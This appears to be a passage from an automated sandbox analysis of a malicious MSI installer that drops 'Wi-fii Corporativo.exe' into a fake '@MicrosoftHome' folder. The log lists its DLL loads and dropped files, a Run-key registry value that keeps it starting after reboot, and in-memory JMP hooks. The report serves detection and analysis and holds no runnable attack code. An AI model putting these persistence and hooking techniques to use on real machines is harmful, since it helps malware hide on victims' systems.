    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: cef_frame.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: magnification.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: d3d9.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: security.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: olepro32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: idndl.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: cef_frame.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: magnification.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: d3d9.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: security.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: olepro32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: idndl.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: cef_frame.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: magnification.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: d3d9.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: security.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: olepro32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: idndl.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: fiF8mxzUfw.msiStatic file information: File size 23667712 > 1048576
    Source: Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: fiF8mxzUfw.msi, MSI2AE0.tmp.1.dr, MSI28F8.tmp.1.dr, MSI2995.tmp.1.dr, MSI2A05.tmp.1.dr, 6f262c.msi.1.dr
    Source: Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr
    Source: initial sampleStatic PE information: section where entry point is pointing to: .z}'
    Source: cef_frame.dll.1.drStatic PE information: section name: .didata
    Source: cef_frame.dll.1.drStatic PE information: section name: .E{7
    Source: cef_frame.dll.1.drStatic PE information: section name: .< a
    Source: cef_frame.dll.1.drStatic PE information: section name: .z}'
    Source: MSI28F8.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI2995.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI29D5.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI2A05.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI2AE0.tmp.1.drStatic PE information: section name: .fptable
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_00511986 push ecx; ret 7_2_00511999
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 8_2_00511986 push ecx; ret 8_2_00511999
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28F8.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2995.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2AE0.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29D5.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A05.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28F8.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2995.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2AE0.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29D5.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A05.tmpJump to dropped file

    Boot Survival

    barindex
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exeJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exeJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exeJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: EE0005 value: E9 8B 2F 01 76 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 76EF2F90 value: E9 7A D0 FE 89 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: EF0005 value: E9 2B BA FC 75 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 76EBBA30 value: E9 DA 45 03 8A Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: F00008 value: E9 8B 8E 00 76 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 76F08E90 value: E9 80 71 FF 89 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 1030005 value: E9 8B 4D A4 74 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 75A74D90 value: E9 7A B2 5B 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 1040005 value: E9 EB EB A4 74 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 75A8EBF0 value: E9 1A 14 5B 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 1050005 value: E9 8B 8A E0 74 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 75E58A90 value: E9 7A 75 1F 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 1060005 value: E9 2B 02 E2 74 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 7732 base: 75E80230 value: E9 DA FD 1D 8B Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 1490005 value: E9 8B 2F A6 75 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 76EF2F90 value: E9 7A D0 59 8A Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 14A0005 value: E9 2B BA A1 75 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 76EBBA30 value: E9 DA 45 5E 8A Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 14B0008 value: E9 8B 8E A5 75 Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 76F08E90 value: E9 80 71 5A 8A Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory written: PID: 8156 base: 14F0005 value: E9 8B 4D 58 74 Jump to behavior
